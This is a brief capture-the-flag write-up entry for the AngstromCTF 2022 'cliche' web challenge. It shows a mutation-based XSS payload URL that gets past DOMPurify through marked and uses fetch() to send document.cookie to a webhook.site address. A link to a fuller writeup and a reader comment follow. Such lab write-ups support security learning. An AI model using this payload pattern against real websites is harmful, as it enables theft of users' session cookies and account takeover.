Tags: mxss web
Rating: 5.0
Mutation based XSS between DOMPurify and marked:
```
https://cliche.web.actf.co/?content=`%3Cp%20x=%22%3Cimg%20src=x%20onerror=fetch(window.location.hash.substring(1)%2Bdocument.cookie)%3Efoo%3C/img%3E%22%20title=%22hello`%22%3E%3Cimg%20src=x%3E%3C/p%3E#https://webhook.site/1b96a1e3-307b-4f46-9f3a-e3eba4cc538d?x=
```
Detailed writeup: [https://fh4ntke.medium.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e](https://fh4ntke.medium.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e)
Very nice writeup! This one stumped me. I had never heard of mXSS before. Way cool!
